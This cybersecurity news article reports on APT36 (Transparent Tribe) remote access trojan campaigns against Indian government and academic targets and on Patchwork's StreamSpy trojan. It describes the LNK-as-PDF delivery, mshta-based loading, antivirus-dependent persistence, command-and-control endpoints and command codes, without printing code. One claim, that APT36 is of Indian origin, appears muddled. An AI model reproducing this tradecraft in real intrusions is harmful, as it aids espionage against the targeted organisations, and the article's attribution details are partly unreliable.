New RAT Attacks Against the Indian Government and Academic Institutions by Transparent Tribe or APT36 -

Post Views: 36

New RAT Attacks Against the Indian Government and Academic Institutions by Transparent Tribe or APT36

A new wave of attacks against Indian governmental, academic, and strategic organizations using a remote access trojan (RAT) that gives them long-term control over infected hosts has been linked to the threat actor Transparent Tribe.

“The campaign uses fraudulent delivery techniques, involving a weaponized Windows shortcut (LNK) file posing as a legitimate PDF document and loaded with full PDF content to evade user suspicion,” CYFIRMA stated in its technical assessment.

The hacking group Transparent Tribe, commonly known as APT36, is well-known for launching cyberespionage operations against Indian businesses. The state-sponsored enemy, thought to be of Indian descent, has been operating since at least 2013.

To achieve its objectives, the threat actor has an ever-evolving arsenal of RATs. CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT are a few of the trojans that Transparent Tribe has used recently.

A spear-phishing email that contained a ZIP archive with an LNK file masquerading as a PDF was the first of the most recent attacks. A remote HTML Application (HTA) script that uses “mshta.exe” to decrypt and load the final RAT payload straight into memory is triggered when the file is opened. In order to avoid raising users’ suspicions, the HTA simultaneously downloads and opens a fake PDF document.

“After decoding logic is set up, the HTA exploits ActiveX objects, especially WScript.Shell, to communicate with the Windows environment,” explained CYFIRMA. “This behavior exhibits environment profiling and runtime modification, guaranteeing compatibility with the intended system and improving execution reliability techniques frequently observed in malware abusing ‘mshta.exe.'”

The malware’s capacity to modify its persistence strategy in response to the antivirus software installed on the compromised system is a notable feature:

If Kaspersky is found, it establishes an operational directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and creates persistence by placing an LNK file in the Windows Startup folder, which then uses “mshta.exe” to start the HTA script.
If Quick Heal is found, it creates a batch file and a malicious LNK file in the Windows Startup folder, writes the HTA payload to disk, and then uses the batch script to call it in order to establish persistence.
It operates by transferring the payload straight into the Startup directory and running it if Avast, AVG, or Avira are found.
Before starting the batch script, it uses a combination of payload distribution, registry-based persistence, and batch file execution if no recognized antivirus program is found.

A DLL called “iinneldc.dll” that serves as a fully functional RAT and supports remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control is included in the second HTA file.

“APT36 (Transparent Tribe) remains an exceedingly tenacious and strategically focused cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity firm stated.

APT36 has also been connected to another campaign in recent weeks that uses a malicious shortcut file that poses as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a . NET-based loader. The loader then drops additional executables and malicious DLLs to establish long-term access, remote command execution, and system reconnaissance.

The shortcut is intended to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”) by executing an obfuscated command using cmd.exe. This command is in charge of starting a sequence of operations:

Take out a fake PDF file and show it to the victim.
Write DLL files to “C:\ProgramData\PcDirvs\wininet.dll” and “C:\ProgramData\PcDirvs\pdf.dll” after decoding them.
After 10 seconds, drop “PcDirvs.exe” to the same spot and run it.
Create “PcDirvs.hta” with Visual Basic Script to modify the registry and launch “PcDirvs.exe” each time the machine boots up to establish persistence.

The National Cyber Emergency Response Team of Pakistan (PKCERT) issued a legitimate advisory in 2024 regarding a fraudulent WhatsApp message campaign that targets Pakistani government entities with a malicious WinRAR file that infects systems with malware, which is why the lure PDF is displayed.

A hard-coded command-and-control (C2) infrastructure maintained at dns. wmiprovider[.]com is accessed via the DLL “wininet.dll”. In the middle of April 2025, it was registered. Although the activity’s C2 is currently dormant, the Windows Registry-based persistence guarantees that the danger may reappear at any time in the future.

The following is a list of endpoints:

/retsiger (register), to register the infected system with the C2 server
/taebtraeh (heartbeat), to beacon its presence to the C2 server
/dnammoc_teg (get_command), to run arbitrary commands via “cmd.exe”
/dnammocmvitna (antivmcommand), to query or set an anti-VM status and likely adjust behavior

Additionally, the DLL searches the victim system’s installed antivirus software, transforming it into a powerful tool that may perform reconnaissance and obtain private data.

Patchwork Linked to New StreamSpy Trojan

The revelation follows weeks after security researcher Idan Tarab connected Patchwork (also known as Dropping Elephant or Maha Grass), a hacking group thought to be of Indian descent, to attacks against Pakistan’s defense industry using a Python-based backdoor that is disseminated via phishing emails containing ZIP files.

The download contains an MSBuild project that, when run with “msbuild.exe,” installs and launches the Python RAT via a dropper. The malware has the ability to connect to a C2 server, execute instructions, upload and download data, and run remote Python modules.

“This campaign reflects a contemporary, highly encrypted Patchwork APT toolkit blending MSBuild LOLBin loaders, PyInstaller‑modified Python runtimes, marshalled bytecode implants, geofencing, randomized PHP C2 endpoints, [and] realistic persistence mechanisms,” Tarab stated.

As of December 2025, Patchwork has also been linked to StreamSpy, a previously unreported trojan that communicates with C2 via WebSocket and HTTP protocols. HTTP is utilized for file transfers, while the WebSocket channel is used to receive instructions and send the execution results.

According to QiAnXin, StreamSpy’s connections to Patchwork result from its resemblance to Spyder, a variation of another backdoor called WarHawk that is credited to SideWinder. Spider has been used by Patchwork since 2023.

The malware (“Annexure.exe”), which is distributed via ZIP archives (“OPS-VII-SIR.zip”) hosted on “firebasescloudemail[.]com,” can gather system data, create persistence via Windows Registry, scheduled tasks, or an LNK file in the Startup folder, and interact with the C2 server via WebSocket and HTTP. The following is a list of support commands:

F1A5C3, to use ShellExecuteExW to download and open a file.
B8C1D2, to configure the shell to execute commands.
E4F5A6, to configure PowerShell as the shell for command execution.
FL_SH1, to shut down every shell.
C9E3D4, E7F8A9, H1K4R8, and C0V3RT to download, extract, and use ShellExecuteExW to open encrypted zip files from the C2 server.
F2B3C4, to collect data regarding the device’s file system and all associated drives.
D5E6F7, to upload and download files.
A8B9C0, to upload files.
To remove a file, use D1E2F3.
To rename a file, use A4B5C6.
D7E8F9, to list a certain folder.

According to QinAnXin, the StreamSpy download site also includes Spyder variants with comprehensive data collecting functionality. Additionally, the malware’s digital signature shows connections with ShadowAgent, another Windows RAT linked to the DoNot Team (also known as Brainworm). It’s interesting to note that in November 2025, 360 Threat Intelligence Center identified the identical “Annexure.exe” executable as ShadowAgent.

“The advent of the StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is continuously iterating its arsenal of attack tools,” the Chinese security company stated.

In order to avoid detection and HTTP traffic filtering, attackers try to employ WebSocket channels for command issuance and result reporting in the StreamSpy malware. Furthermore, the associated samples provide additional evidence that the Maha Grass and DoNot attack groups share some resources.

About The Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.

GlassWorm Malware Campaign Targets iMacs with Trojanized Crypto Wallets